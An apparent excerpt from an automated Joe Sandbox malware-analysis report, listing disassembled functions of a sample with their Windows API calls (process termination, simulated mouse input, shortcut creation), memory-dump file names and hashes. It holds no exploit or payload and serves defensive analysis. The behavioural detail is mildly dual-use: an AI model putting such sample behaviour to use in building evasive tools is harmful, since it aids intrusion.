                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1bcc68a412a12581bf56901a0c7c012da2ba3d794a16ff0728664ca9f596eb45
                                                                                                                                                                                                                                                                                                    • Instruction ID: b932e078f50625cfc0a479625596f6cce6ef0dc893a57c5995e2b14140ebbb78
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bcc68a412a12581bf56901a0c7c012da2ba3d794a16ff0728664ca9f596eb45
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E251B432650310EBCF20AB64DC99E69B3A5AF45311F24D446F90EEF297DB709C41CB96
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00A89F2A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A89F4B
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A89F72
                                                                                                                                                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00A89FCA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                    • Opcode ID: 232e215dedb3d9adb229ccd263a60d3a478b178dc3507e75348b38d6c1fb9c3f
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae1f127a7f632a9573d11610b074c8240b934adc2cb92e495e01752c7708d7b1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 232e215dedb3d9adb229ccd263a60d3a478b178dc3507e75348b38d6c1fb9c3f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E18271608340DFD724EF24C981AABB7E1BF85314F04896DF8899B2A2DB31DD45CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A86F21
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A8707E
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00AB0CC4,00000000,00000001,00AB0B34,?), ref: 00A87095
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A87319
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                    • Opcode ID: 645dae2a7c556a2bdb5e50a1953e05c0a5123a871c6fd8086276066f570fe906
                                                                                                                                                                                                                                                                                                    • Instruction ID: ef996359ab4da059bf39b052be88c6761ff7b80f552ac147d64f8ee1f99ed979
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 645dae2a7c556a2bdb5e50a1953e05c0a5123a871c6fd8086276066f570fe906
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FD14771508201AFD304EF24C981EABB7E8FF98704F50496DF5968B2A2DB71ED45CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00A11B35
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A11B99
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00A11BB6
                                                                                                                                                                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A11BC7
                                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00A11C15
                                                                                                                                                                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A53287
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11C2D: BeginPath.GDI32(00000000), ref: 00A11C4B
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 136d44949af35677947109842f6a84ad271248fdbb5f50878e51961158f29d7a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 663f010bb1bfa9ffb3f4bb49825ba84a5aa3fcfc252d6969b078426619575d1c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 136d44949af35677947109842f6a84ad271248fdbb5f50878e51961158f29d7a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741CF71108341AFCB10DF64DCC4FBA7BB8EB56324F040669FA958A1E2C7309985DB62
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A811B3
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A811EE
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00A8120A
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00A81283
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A8129A
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A812C8
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6abd2ac23d4f8dce09c0e3bb33f31a34551429bc2570f5dcc098724cd08fa501
                                                                                                                                                                                                                                                                                                    • Instruction ID: b6b53c6510e249e5525d45deb0c9b5e7d0ba0c0cf64a990309d738890687a8a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6abd2ac23d4f8dce09c0e3bb33f31a34551429bc2570f5dcc098724cd08fa501
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B418B71900205EFDF04EF94DC85AAAB7B8FF04300F1041A9FD009A296DB30DE56DBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A6FBEF,00000000,?,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00AA8CA7
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00AA8CCD
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AA8D2C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00AA8D40
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00AA8D66
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AA8D8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5de74e27769beb4455be1a8cbe79d1cf04bcd1613441efcc6e412d4c9057ab96
                                                                                                                                                                                                                                                                                                    • Instruction ID: b2e05d4ef3b407e72722e15ed13ed68ba28d8da695625a276cd0a56538366705
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5de74e27769beb4455be1a8cbe79d1cf04bcd1613441efcc6e412d4c9057ab96
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A419130602245AFDB25DF64C889BA57BF1FB47314F1850A9E5494F2E3CB39A856CF60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00A92D45
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8EF33: GetWindowRect.USER32(?,?), ref: 00A8EF4B
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A92D6F
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00A92D76
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A92DB2
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A92DDE
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A92E3C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0f9a40124a1339ae9d2d9f1bc221c8ceac24bc6def347cfbf0399c25fdb5aa45
                                                                                                                                                                                                                                                                                                    • Instruction ID: 85ac84c3d74f62205b79c090c2a6b7f5e71e963940601b2a9a14036a06988877
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f9a40124a1339ae9d2d9f1bc221c8ceac24bc6def347cfbf0399c25fdb5aa45
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D131D072605316AFCB20DF54C849B9BB7E9FBC5314F000919F489A7191DB30EA09CBD2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00A755F9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A75616
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A7564E
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7566C
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A75674
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00A7567E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 726fd47458f66809a01e374c572dfacd37105ab54b819017cfd16e8f599d61c1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 52fdc66b1e603f058f3a32d51f42c68ba5f8a2eaef3c10b473e5777b1114eab3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 726fd47458f66809a01e374c572dfacd37105ab54b819017cfd16e8f599d61c1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D213572A046007BEB159B79DC49E7FBBA8DF49720F18C02DF80ACA091EFA1DC419760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A862C0
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00A863DA
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00AB0CC4,00000000,00000001,00AB0B34,?), ref: 00A863F3
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00A86411
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA8740
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AA8765
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AA877D
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AA87A6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A8C1F2,00000000), ref: 00AA87C6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AA87B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00A336E9,00A33355), ref: 00A33700
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A3370E
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A33727
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00A336E9,00A33355), ref: 00A33779
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00A34D53,00000000,?,?,00A368E2,?,?,00000000), ref: 00A430EB
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4311E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43146
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A43153
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A4315F
                                                                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00A43165
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A11F87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11F96
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: BeginPath.GDI32(?), ref: 00A11FAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11FD6
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AA94AA
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00AA94BE
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AA94CC
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00AA94DC
                                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00AA94EC
                                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00AA94FC
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 33e73f6a59f77a6f0992ed2f60237546835097b2cb73d449368d4cde0d9d0603
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7f01d355bc427f07b661687ab70b1031c5f83f4101d84bdd206de2ec9bbb2c12
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33e73f6a59f77a6f0992ed2f60237546835097b2cb73d449368d4cde0d9d0603
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911DB7600014DBFDF129F90EC89E9A7F6DEB09364F048011BA5A5A1A1C7719D56DBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A75B7C
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A75B8D
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A75B94
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00A75B9C
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A75BB3
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A75BC5
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07d56c9dfef74bfdd37eef147ed658fb0add916afadd6a7653a791f73daae169
                                                                                                                                                                                                                                                                                                    • Instruction ID: d31f9dea30b2fc4f9255ef069e2c13ef5e9fd66c501620c680f3a3118259ed9b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07d56c9dfef74bfdd37eef147ed658fb0add916afadd6a7653a791f73daae169
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5014F75E00719BBEB109BF59C49F5EBFB8EB49751F008066FA49A7280E7709C01CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A132AF
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A132B7
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A132C2
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A132CD
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A132D5
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A132DD
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Virtual
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e4bb1d0c09c7e44696924cdf7b58252755bed4e973a03b0999ed96875d0006b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 96c3733f2b034f0348091d3a996741f4d2a67a6c1b8d8f00346fc30707eb4747
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4bb1d0c09c7e44696924cdf7b58252755bed4e973a03b0999ed96875d0006b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A7F447
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A7F45D
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00A7F46C
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7F47B
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7F485
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7F48C
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 523b8cec2ceb1c1673cd307a90c643d4b865c09eac9bd3b50b4ed2de5f347093
                                                                                                                                                                                                                                                                                                    • Instruction ID: 07a2c0133dc74dbf5def92b178f228978146f30d03abdec96344d46304bfb7f2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 523b8cec2ceb1c1673cd307a90c643d4b865c09eac9bd3b50b4ed2de5f347093
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF03A3224115ABBE7219BA29C0EEEF7B7CEFC7B11F000158F646910D0DBA46A42C6B5
                                                                                                                                                                                                                                                                                                    APIs
